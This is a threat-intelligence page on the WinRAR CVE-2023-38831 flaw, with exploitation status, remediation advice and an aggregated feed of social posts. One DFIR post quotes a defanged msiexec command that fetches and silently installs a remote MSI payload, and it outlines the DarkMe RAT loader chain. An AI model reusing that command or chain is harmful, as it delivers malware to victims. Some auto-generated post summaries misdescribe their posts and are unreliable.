CVE-2023-38831Active Exploitation(rarlab / winrar)

CRITICALCVSS 7.8 · HIGHCISA KEV

Exploitation ongoing with high activity in latest observed window (2 mentions)

Immediate actions

  • Patch rarlab winrar systems immediately
  • Assume compromise if assets are exposed
  • Hunt for exploitation attempts and persistence artifacts
  • Increase monitoring for publicly documented tradecraft

Recommended action window: Immediate (within 24h)

NVD description

RARLAB WinRAR before 6.23 allows attackers to execute arbitrary code when a user attempts to view a benign file within a ZIP archive. The issue occurs because a ZIP archive may include a benign file (such as an ordinary .JPG file) and also a folder that has the same name as the benign file, and the contents of the folder (which may include executable content) are processed during an attempt to access only the benign file. This was exploited in the wild in April through October 2023.

8.0/ 10 priority

Sources & remediation

Listed in the CISA Known Exploited Vulnerabilities catalog. Federal remediation due date: 2023-09-14. Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.

Weakness type (CWE)
CWE-345CWE-351

Priority

CRITICAL

Exploitation

ACTIVE

PoC

YES

Patch

AVAILABLE

Momentum

STABLE

Are you affected?

If you run products in this scope, you should treat this CVE as relevant to your environment.

  • winrar

Threat summary

  • Active exploitation appears in 9 classified signals
  • Public PoC and exploit tooling are both present
  • Patch or workaround signal is available
  • 17 mentions across 15 observed days

What's happening

  • Active exploitation reported across 9 signals
  • Exploit tool or code specified in 1 signal
  • PoC mentioned or linked in 2 signals
  • Patch or workaround mentioned in 6 signals
  • Technical details provided in 5 signals
  • General: 4 classified signals
  • Peaked 10d ago at 2 mentions (2026-03-06); latest day: 2
  • 17 total mentions across 15 days

Affected systems

Vendors
Products
winrar

Deep dive

Activity timeline17 mentions / 15d
01122Mentions · 2026-01-28: 1Mentions · 2026-01-29: 1Mentions · 2026-01-30: 1Mentions · 2026-02-04: 1Mentions · 2026-03-06: 2Mentions · 2026-03-29: 1Mentions · 2026-04-15: 1Mentions · 2026-05-14: 1Mentions · 2026-05-27: 1Mentions · 2026-06-15: 1Mentions · 2026-06-21: 1Mentions · 2026-08-17: 1Mentions · 2026-09-14: 1Mentions · 2026-09-23: 1Mentions · 2026-10-08: 2PoC Mentioned / Linked · 2026-03-06: 1PoC Mentioned / Linked · 2026-03-29: 1Exploit Tool / Code · 2026-05-14: 1Active Exploitation · 2026-01-28: 1Active Exploitation · 2026-01-29: 1Active Exploitation · 2026-02-04: 1Active Exploitation · 2026-03-06: 1Active Exploitation · 2026-04-15: 1Active Exploitation · 2026-05-14: 1Active Exploitation · 2026-06-15: 1Active Exploitation · 2026-06-21: 1Active Exploitation · 2026-08-17: 1Patch / Workaround · 2026-01-28: 1Patch / Workaround · 2026-01-29: 1Patch / Workaround · 2026-02-04: 1Patch / Workaround · 2026-03-29: 1Patch / Workaround · 2026-04-15: 1Patch / Workaround · 2026-06-21: 1Technical Details · 2026-01-28: 1Technical Details · 2026-01-30: 1Technical Details · 2026-03-06: 1Technical Details · 2026-05-27: 1Technical Details · 2026-06-21: 101-2801-2901-3002-0403-0603-2904-1505-1405-2706-1506-2108-1709-1409-2310-08
Signal classification5 categories
Active Exploitation
746.7%
General
426.7%
Patch
213.3%
Exploit
16.7%
Disclosure
16.7%
Referenced assets9 URLs
Classification over time
DateTotalLabels
2026-01-281
Active Exploitation1
2026-01-291
Active Exploitation1
2026-01-301
General1
2026-02-041
Active Exploitation1
2026-03-062
Active Exploitation1General1
2026-03-291
Patch1
2026-04-151
Patch1
2026-05-141
Active Exploitation1
2026-05-271
General1
2026-06-151
Active Exploitation1
2026-06-211
Active Exploitation1
2026-08-171
Exploit1
2026-09-141
General1
2026-09-231
Disclosure1
Full discourse17 posts
  • DFIR Radar@DFIR_Radar
    Disclosure

    Water Hydra's DarkMe RAT drops zero-day delivery for plain .pif phishing, reaching beyond forex traders into corporate environments. The loader chain is unchanged; only the entry point got cheaper. - Water Hydra (EvilNum/DarkCasino) swapped CVE-2023-38831 and CVE-2024-21412 for a malspam link pointing to image.pif (SHA256: 394c93df...), a PE32+ binary Windows executes on double-click. The .pif extension is a DOS-era relic with no legitimate modern use, making any execution event an immediate hunt priority. The file was masqueraded as a PNG and delivered from readonline365[.]com and four other hosts, all scoring 0 malicious on VirusTotal at discovery. - The chain: PIF spawns msiexec /i hxxps://onlineview365[.]com/propi.msi /quiet, which drops components to %AppData%\ComponentsFolder\ via EXPAND.EXE, runs prnfig.wsf to write a COM registration (CLSID {CFDC57BA-1705-45AF-BA10-EFC3D592982B}) via reg.exe import, then fires rundll32.exe /sta {CLSID}, an opaque invocation with no DLL path on the command line, through three VB6 loader DLLs: Coconout.dll, Use.dll (FillText), and Finalized.dll (Calculation). - Use.dll gates on a 329-app process list containing wallets, trading terminals, game launchers, and RGB utilities but zero analysis tools. This is an inverted sandbox check: no Steam or Slack means no real user, and execution stops cleanly. #DFIR_Radar

    Post summary

    The tweet announces a zero‑day .pif phishing delivery by Water Hydra’s DarkMe RAT, affecting forex and corporate environments, without providing patches, exploit tools, or proof‑of‑concept details.

    10101257
    2.0K followersView on X
  • ♫NØX♥H♪@_Why_Noot

    NØX Echo Lineage Signal: CVE-2023-38831 Entity: WinRAR Lineage: Public vulnerability → Public exploit/PoC → Observed exploitation → Ransomware campaign use Relationship: - WinRAR → CVE-2023-38831 → Evidence → Operational Risk Current State:

    1000035
    8 followersView on X
  • 𝑽𝒂𝒍𝒆𝒓𝑰𝑨@ValeriA_Tech
    Exploit

    En 2023 se descubrió una vulnerabilidad crítica en WinRAR: CVE-2023-38831. El atacante creaba un .rar aparentemente normal. Al extraerlo, se copiaba un archivo malicioso en la carpeta Startup de Windows. Todo lo que está en esa carpeta se ejecuta automáticamente al iniciar el sistema.

    Post summary

    The text reports CVE-2023-38831, a critical WinRAR flaw, and describes how attackers exploit it by tricking users into extracting a .rar that copies malicious files to the Windows Startup folder. No PoC, patch, or detailed technical data is provided.

    10000438
    105.0K followersView on X
  • NerdieNews@NewsNerdie
    Active Exploitation

    🔴 Hackers are actively exploiting CVE-2023-38831 in WinRAR to steal traders’ dollars, using spoofed extensions to deliver malware. This zero-day bypasses file defenses entirely. Patch immediately or risk financial loss. #NerdieNews #CyberSecurity #Ransomware https://t.co/2BUnGJqyDX

    Post summary

    The tweet reports active exploitation of CVE‑2023‑38831 in WinRAR by attackers using a zero‑day bypass, urges immediate patching, but does not provide a PoC or exploit code.

    00010101
    68 followersView on X
  • nksistemas@nksistemas
    Active Exploitation

    CVE-2023-38831: La Crítica Vulnerabilidad de WinRAR Explotada por APT28 en Ataques Zero-Day https://nksistemas.com/cve-2023-38831-la-critica-vulnerabilidad-de-winrar-explotada-por-apt28-en-ataques-zero-day/

    Post summary

    The article claims that the WinRAR CVE-2023-38831 was actively exploited by APT28 in zero-day attacks, yet it lacks technical details, PoC, or patch information.

    00001110
    6.2K followersView on X
  • ThreatCluster@threatcluster
    Active Exploitation

    BREAKING: Belarus-aligned FrostyNeighbor hits Ukrainian government with Ukrtelecom-themed spearphishing using JS PicassoLoader, Cobalt Strike payloads and CVE-2023-38831 exploits. https://threatcluster.io/cluster/frostyneighbor-targets-ukrainian-government-with-evolving-cy-caed2b36

    Post summary

    The post reports that FrostyNeighbor is actively exploiting CVE-2023-38831 against Ukrainian government targets using Cobalt Strike and other tools.

    00001110
    245 followersView on X
  • Zero-sum@projectzerosum
    General

    4/ 🔗 Verified sources: • Analysis: http://thehackernews.com/2023/08/winrar-security-flaw-exploited-in-zero.html • CVE Record: http://cve.org/CVERecord?id=CVE-2023-38831 • NVD Details: http://nvd.nist.gov/vuln/detail/CVE-2023-38831 All links verified ✅

    Post summary

    The entry lists external links to analyses and official CVE records for CVE-2023-38831 but lacks any detailed technical or exploit information.

    1000070
    34 followersView on X
  • Zero-sum@projectzerosum
    Active Exploitation

    1/ 🚨 WinRAR Zero-Day (CVE-2023-38831) — actively exploited in the wild. Attackers crafted ZIP archives that execute arbitrary code when users open seemingly innocent files. Over 500M WinRAR users were at risk. Here's how the attack works 🧵 https://t.co/pcxlavDa4V

    Post summary

    The WinRAR CVE-2023-38831 is confirmed to be actively exploited via malicious ZIP archives, with detailed attack explanation shared but no patch or exploit code referenced.

    10000121
    34 followersView on X
  • たあぬほ)ふじ、 Kestrel@KestrelYTReal
    General

    @ramdileo @NotNordgaren Brother, you're vulnerable not just to the one above but also CVE-2023-38831 File Spoofing CVE-2018-20250 Ace PT CVE-2006-3845 Buffer Overflow All well-known exploits. Old does not equal exploit-free. almost always the opposite, see any legacy Windows version as a example

    Post summary

    The tweet lists three CVEs with brief vulnerability descriptors and warns about legacy Windows but offers no PoC, exploit, mitigation, or active exploitation details.

    10000140
    27 followersView on X
  • Misbar | مسبار@MisbarSec
    Active Exploitation

    تحذير من ثغرة في WinRAR تستخدم للسيطرة على أنظمة ويندوز Google تحذر من ثغرة حرجة في WinRAR، برنامج ضغط الملفات الشهير. يستغل المهاجمون هذه الثغرة للوصول غير المصرح به للأنظمة والسيطرة عليها. تم استغلال ثغرتين تحديدًا، CVE-2025-8088 و CVE-2023-38831. 💡 الحماية: - تأكد من تحديث WinRAR لأحدث إصدار. - كن حذرًا عند فتح ملفات مضغوطة من مصادر غير موثوقة. - استخدم برامج Antivirus محدثة. https://cybersecuritynews.com/google-warns-of-winrar-vulnerability-exploited/ #الأمن_السيبراني #WinRAR #vulnerability #Exploit

    Post summary

    Google warns that attackers are exploiting two critical WinRAR CVEs to gain unauthorized control of Windows systems, emphasizing the need to update the software and maintain antivirus protection.

    00010177
    51 followersView on X
  • Adam Goss@gossy_84
    Active Exploitation

    🗞️ Despite being patched in August 2023, cybercriminals and state-sponsored threat actors continue to successfully exploit a major path traversal vulnerability (CVE-2023-38831) in WinRAR. This highlights how attackers use "zombie" vulnerabilities to breach even modern networks.

    Post summary

    CVE‑2023‑38831 remains actively exploited in the wild despite a patch in August 2023, illustrating the persistence of "zombie" vulnerabilities.

    10000103
    1.5K followersView on X
  • ♫Why♥Not♪@Python_s_

    NØØT Ransomware Watch Classification: Critical CVE: CVE-2023-38831 Product: RARLAB / WinRAR Summary: VulnCheck reports real-world exploitation activity affecting RARLAB / WinRAR. Evidence: Public PoC/exploit available; Ransomware use confirmed; Active exploitation reported; Severe impact class Impact: The vulnerability is associated with ransomware activity and may contribute to compromise of exposed systems. Action: Prioritize vendor remediation, identify exposed affected systems, and investigate for evidence of exploitation when applicable. Date: 10 Jul 2023 Source: https://vulncheck.com/xdb/f3b016e52591 #NØØT #CyberSecurity #InfoSec #ThreatIntelligence #CyberThreats #CVE #CyberDefense #WinRAR #CVE_2023_38831 #ActiveExploitation #Exploit #Ransomware

    0000045
    227 followersView on X
  • Slade 🛡️ LLM Hacker@llm_redteam
    General

    @theXSSrat cve-2023-38831 is still unpatched in most of those portals. what is the real infra cost?

    Post summary

    The tweet highlights that CVE-2023-38831 remains unpatched in many portals but does not mention exploitation, technical details, or remediation steps, focusing instead on infrastructure cost concerns.

    0000048
    1.3K followersView on X
  • Lybe🇦🇷Rant@lyberant
    General

    @WinRAR_RARLAB no way, what you bring that peazip cannot do?, not an obscure feature, an actual useful feature. no linux gui version, CVE wirh RCE from 20 that might live there by a lot of years old, but you claim its secure (CVE-2023-38831). Some things needs to die

    Post summary

    The tweet mentions an RCE vulnerability (CVE‑2023-38831) but provides only limited technical context, with no evidence of exploitation, patching, or a PoC.

    0000089
    1.4K followersView on X
  • Security Arsenal, LLC@SecurityAr58409
    Patch

    🔒 #CyberSecurity CVE-2023-38831: WinRAR Exploitation by Amaranth-Dragon — Detection and Hardenin… "Security teams must prioritize patching WinRAR immediately following confirmed reports of…" 🔗 https://securityarsenal.com/blog/cve-2023-38831-winrar-exploitation-by-amaranth-dragon-detection-and-hardening-guide #CyberSecurity #ThreatIntel #vulnerability #cve #patch

    Post summary

    The post urges immediate patching of WinRAR due to confirmed exploitation of CVE-2023-38831, emphasizing detection and hardening measures, but does not provide PoC or exploit code details.

    0000050
    10 followersView on X
  • Audn AI@audn_ai
    Patch

    @ozgurozkan123 @fkadev @grok During a client breach test we fed PatchBot an unpatched CVE-2023-38831, it spat out a single bash line that recompiled the vulnerable module in under ten seconds. That speed felt like magic 🚀

    Post summary

    PatchBot generates a quick patch command for CVE-2023-38831, enabling fast remediation of the vulnerability in under ten seconds.

    0000093
    127 followersView on X
  • Osman@osmanmuratgul
    Active Exploitation

    #AmaranthDragon (APT41 bağlantılı) yeni bir casusluk kampanyasında WinRAR CVE-2023-38831 zafiyetini aktif kullanıyor. Hedef: Güneydoğu Asya'daki devlet kurumları. Kritik güncellemeler ve yamalar hayati önemde. #SiberGuvenlik #APT #Exploit https://thehackernews.com/2026/02/china-linked-amaranth-dragon-exploits.html

    Post summary

    AmaranthDragon, linked to APT41, is actively exploiting WinRAR CVE‑2023‑38831 in a campaign against Southeast Asian government agencies, underscoring the urgency of applying critical patches.

    00000148
    51 followersView on X
CPE platform detail1 entries

1 of 1 entries

PartVendorProductVersionTarget SWTarget HW
Apprarlabwinrar---

Explore more